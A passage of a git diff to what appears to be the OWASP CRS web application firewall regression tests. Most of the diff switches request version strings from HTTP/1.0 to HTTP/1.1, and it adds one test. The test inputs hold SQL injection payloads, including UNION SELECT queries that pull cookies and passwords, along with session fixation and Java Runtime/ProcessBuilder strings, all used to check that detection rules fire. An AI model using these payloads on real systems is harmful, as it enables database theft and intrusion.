%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942522]
@@ -156,7 +156,24 @@ tests:
           port: 80
           uri: "/post"
           data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--"
-          version: HTTP/1.0
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942522]
+  - test_id: 10
+    desc: "Integration test: 942522 blocks foo\\''or'oof"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "var=foo%5c''or'oof"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942522]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
index 0fc688711..a96fde431 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin@juice-sh.op';&password=foo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942530]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
index ad78ed7d5..ecc097189 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op';"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942540]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op\";"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942540]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op`;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942540]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email='foo';'bar';'def'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942540]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=`foo`;`bar`;`def`"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942540]
@@ -129,7 +129,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942540]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
index f6691e602..78c315849 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
@@ -19,7 +19,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -37,7 +37,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -56,7 +56,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -74,7 +74,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -93,7 +93,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -111,7 +111,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -130,7 +130,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -148,7 +148,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -167,7 +167,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -185,7 +185,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -204,7 +204,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -222,7 +222,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -241,7 +241,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -259,7 +259,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -278,7 +278,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -296,7 +296,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -315,7 +315,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -333,7 +333,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -352,7 +352,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -370,7 +370,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -389,7 +389,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -407,7 +407,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -426,7 +426,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -444,7 +444,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -463,7 +463,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -481,7 +481,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -500,7 +500,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -518,7 +518,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -537,7 +537,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -555,7 +555,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -574,7 +574,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -592,7 +592,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -611,7 +611,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -629,7 +629,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -648,7 +648,7 @@ tests:
           port: 80
           uri: "/post"
           data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
@@ -666,7 +666,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942550]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
index 091b97236..67a8ccf78 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/get"
           data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942560]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "foo=1.e(ascii)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942560]
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
index f0a02000d..0f108fe6f 100644
--- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
+++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
@@ -38,7 +38,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?phpsessid=asdfdasfadsads"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [943110]
@@ -55,7 +55,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?phpsessid=asdfdasfadsads"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [943110]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
index 89a8f7567..a8885b74b 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: en-us,en;q=0.5
             Content-Type: "text/plain"
           method: POST
-          version: HTTP/1.0
+          version: HTTP/1.1
           uri: "/post"
           data: "test=value"
         output:
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
index c1a60d1d6..1a4af67b7 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=java.lang.Runtime"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "text/plain"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=java.lang.ProcessBuilder"
         output:
           log:
@@ -58,7 +58,7 @@ tests:
             Content-Type: "text/plain"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "java.lang.Runtime=test"
         output:
           log:
@@ -78,7 +78,7 @@ tests:
             Content-Type: "text/plain"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "java.lang.ProcessBuilder=test"
         output:
           log:
@@ -99,7 +99,7 @@ tests:
             Cookie: test=java.lang.Runtime
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -120,7 +120,7 @@ tests:
             Cookie: test=java.lang.ProcessBuilder
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -141,7 +141,7 @@ tests:
             Cookie: java.lang.Runtime=test
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -162,7 +162,7 @@ tests:
             Cookie: java.lang.ProcessBuilder=test
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -183,7 +183,7 @@ tests:
             test: java.lang.Runtime
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -204,7 +204,7 @@ tests:
             test: java.lang.ProcessBuilder
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -224,7 +224,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><java.lang.Runtime attribute_name=\"attribute_value\">value</java.lang.Runtime></xml>"
         output:
           log:
@@ -244,7 +244,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element java.lang.Runtime=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -264,7 +264,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Runtime\">element_value</element></xml>"
         output:
           log:
@@ -284,7 +284,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Runtime</element></xml>"
         output:
           log:
@@ -304,7 +304,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><java.lang.ProcessBuilder attribute_name=\"attribute_value\">value</java.lang.ProcessBuilder></xml>"
         output:
           log:
@@ -324,7 +324,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element java.lang.ProcessBuilder=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -344,7 +344,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.ProcessBuilder\">element_value</element></xml>"
         output:
           log:
@@ -364,7 +364,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.ProcessBuilder</element></xml>"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
index 7cf19d15c..05ead2869 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=java.Runtime"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "text/plain"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=java.ProcessBuilder"
         output:
           log:
@@ -58,7 +58,7 @@ tests:
             Content-Type: "text/plain"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "java.Runtime=test"
         output:
           log:
@@ -78,7 +78,7 @@ tests:
             Content-Type: "text/plain"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "java.ProcessBuilder=test"
         output:
           log:
@@ -99,7 +99,7 @@ tests:
             Cookie: test=java.Runtime
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -120,7 +120,7 @@ tests:
             Cookie: test=java.ProcessBuilder
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -141,7 +141,7 @@ tests:
             Cookie: java.Runtime=test
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -162,7 +162,7 @@ tests:
             Cookie: java.ProcessBuilder=test
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -183,7 +183,7 @@ tests:
             test: java.Runtime
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -204,7 +204,7 @@ tests:
             test: java.ProcessBuilder
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "test=value"
         output:
           log:
@@ -224,7 +224,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><java.Runtime attribute_name=\"attribute_value\">value</java.Runtime></xml>"
         output:
           log:
@@ -244,7 +244,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element java.Runtime=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -264,7 +264,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.string\" attribute2_name=\"Runtime\">element_value</element></xml>"
         output:
           log:
@@ -284,7 +284,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.Runtime</element></xml>"
         output:
           log:
@@ -304,7 +304,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><java.ProcessBuilder attribute_name=\"attribute_value\">value</java.ProcessBuilder></xml>"
         output:
           log:
@@ -324,7 +324,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element java.ProcessBuilder=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -344,7 +344,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.string\" attribute_name2=\"ProcessBuilder\">element_value</element></xml>"
         output:
           log:
@@ -364,7 +364,7 @@ tests:
             Content-Type: "application/xml"
           method: POST
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.ProcessBuilder</element></xml>"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
index f4b8e75e1..406199ebe 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
@@ -19,7 +19,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.clonetransformer"
         output:
           log:
@@ -39,7 +39,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.clonetransformer=test"
         output:
           log:
@@ -60,7 +60,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.clonetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -81,7 +81,7 @@ tests:
             Cookie: ProcessBuilder.evil.clonetransformer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -102,7 +102,7 @@ tests:
             test: ProcessBuilder.evil.clonetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -122,7 +122,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
